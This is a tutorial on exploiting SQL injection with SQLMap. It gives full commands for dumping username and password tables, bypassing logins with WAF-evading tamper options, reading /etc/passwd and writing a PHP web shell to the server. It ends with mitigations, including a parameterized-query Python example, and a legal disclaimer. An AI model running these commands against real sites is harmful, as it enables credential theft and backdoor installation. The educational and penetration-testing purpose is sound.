### SQL Injection with SQLMap: A Full Guide with Practical Examples


**SQLMap** is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. It's a powerful tool widely used by security professionals for ethical hacking and vulnerability assessments.


### What You Need


1. **SQLMap** installed on your system (Linux, Windows, or macOS).

2. A vulnerable web application for testing (such as DVWA - Damn Vulnerable Web App or any controlled environment).

3. **Python** installed (SQLMap is a Python-based tool).


### Step-by-Step Guide to SQL Injection with SQLMap


#### Step 1: Install SQLMap


1. **Install SQLMap** on Linux:

   ```bash
   sudo apt update
   sudo apt install sqlmap
   ```


2. **Install SQLMap** on Windows or macOS:

   - Download SQLMap from the official GitHub repository: [SQLMap GitHub](https://github.com/sqlmapproject/sqlmap).

   - Extract the files and run SQLMap using Python:

     ```bash
     python sqlmap.py
     ```


#### Step 2: Identify a Vulnerable URL


For this demonstration, we'll use an example URL:

```plaintext
http://example.com/products.php?id=1
```


#### Step 3: Testing for SQL Injection Vulnerability


1. **Basic Test with SQLMap**:

   Run SQLMap to test if the parameter `id` is vulnerable:

   ```bash
   sqlmap -u "http://example.com/products.php?id=1" --batch --banner
   ```

   - `-u` specifies the target URL.

   - `--batch` runs SQLMap in non-interactive mode, automatically choosing the default options.

   - `--banner` retrieves the DBMS banner (database type and version) once an injection point is confirmed.


2. **Analyzing Results**:

   - If vulnerable, SQLMap will display the database banner, indicating the database type and version.


#### Step 4: Extracting Database Information


1. **Enumerate Databases**:

   Extract all databases on the server:

   ```bash
   sqlmap -u "http://example.com/products.php?id=1" --dbs
   ```

   - `--dbs` lists all databases.


2. **Select a Database**:

   Choose a database to explore, e.g., `test_db`.


3. **Enumerate Tables**:

   List all tables in the chosen database:

   ```bash
   sqlmap -u "http://example.com/products.php?id=1" -D test_db --tables
   ```

   - `-D test_db` specifies the database.


4. **Extract Columns from a Table**:

   Choose a table, e.g., `users`, and list its columns:

   ```bash
   sqlmap -u "http://example.com/products.php?id=1" -D test_db -T users --columns
   ```

   - `-T users` specifies the table.


5. **Dump Data from Columns**:

   Extract data from columns like `username` and `password`:

   ```bash
   sqlmap -u "http://example.com/products.php?id=1" -D test_db -T users -C username,password --dump
   ```

   - `-C username,password` specifies the columns.

   - `--dump` extracts and displays the data.


#### Step 5: Bypassing Authentication


Using SQLMap, you can bypass login pages by injecting into vulnerable input fields (like usernames and passwords).


1. **Example of Bypassing a Login**:

   If the login form uses an endpoint like `login.php?user=admin`, use SQLMap to test it:

   ```bash
   sqlmap -u "http://example.com/login.php?user=admin&pass=1" --batch --level=5 --risk=3 --tamper=space2comment
   ```

   - `--level=5` and `--risk=3` increase the depth and risk of the tests.

   - `--tamper=space2comment` replaces the spaces in each payload with inline SQL comments so that simple keyword filters do not match (useful for WAF evasion).


#### Step 6: Advanced Exploitation


1. **Reading Files from the Server**:

   SQLMap can be used to read server files (if the database user's privileges permit):

   ```bash
   sqlmap -u "http://example.com/products.php?id=1" --file-read="/etc/passwd"
   ```


2. **Writing Files to the Server**:

   Upload a backdoor or shell (requires elevated database privileges and a writable destination path):

   ```bash
   sqlmap -u "http://example.com/products.php?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
   ```


### Securing Against SQL Injection


1. **Input Validation**: Validate all inputs and only allow expected characters.

2. **Parameterized Queries**: Use prepared statements and parameterized queries to separate SQL code from data.

3. **Web Application Firewalls (WAF)**: Deploy a WAF to detect and block SQL injection attempts.

4. **Least Privilege Principle**: Restrict database permissions and only allow necessary access.

5. **Regular Security Testing**: Perform regular audits and penetration testing on your web applications.
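The first two mitigations side by side, as an added example that is not part of the original guide: a Python/sqlite3 stand-in for the `products.php?id=1` endpoint (the `products` table and its rows are constructed here), showing the concatenated query that SQLMap would flag next to its validated, parameterized replacement.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample table standing in for the one behind products.php?id=1.
    # The schema and rows are assumptions for this example, not from the guide.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, public INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "Widget", 1), (2, "Gadget", 1), (3, "Unreleased prototype", 0)],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, product_id: str) -> list:
    # Vulnerable: the raw ?id= value is pasted into the SQL text, so the
    # request can change the query's logic. A value such as "1 OR 1=1" turns
    # the WHERE clause into (public = 1 AND id = 1) OR 1=1 and returns every
    # row, including the non-public one. This is what SQLMap's probes detect.
    sql = "SELECT id, name FROM products WHERE public = 1 AND id = " + product_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, product_id) -> list:
    # Mitigation 2 (parameterized query): the value is bound separately from
    # the SQL text, so it is only ever compared as data. "1 OR 1=1" is then
    # just a string that matches no integer id, and no rows come back.
    sql = "SELECT id, name FROM products WHERE public = 1 AND id = ?"
    return conn.execute(sql, (product_id,)).fetchall()


def validate_id(product_id: str) -> int:
    # Mitigation 1 (input validation): only a positive integer is an
    # acceptable id; anything else is rejected before reaching the database.
    if not product_id.isdigit():
        raise ValueError("id must be a positive integer")
    return int(product_id)


def lookup_hardened(conn: sqlite3.Connection, product_id: str) -> list:
    # Both mitigations together: validate the type, then bind the value.
    return lookup_parameterized(conn, validate_id(product_id))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable  :", lookup_vulnerable(db, "1 OR 1=1"))   # leaks all 3 rows
    print("parameterized:", lookup_parameterized(db, "1 OR 1=1"))  # []
    print("hardened    :", lookup_hardened(db, "1"))              # [(1, 'Widget')]
```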


### Legal and Ethical Considerations


Using SQLMap on websites without explicit permission is illegal and unethical. This guide is meant for educational purposes only to help developers secure their applications against SQL injection. Always use these techniques responsibly and only on systems you are authorized to test.
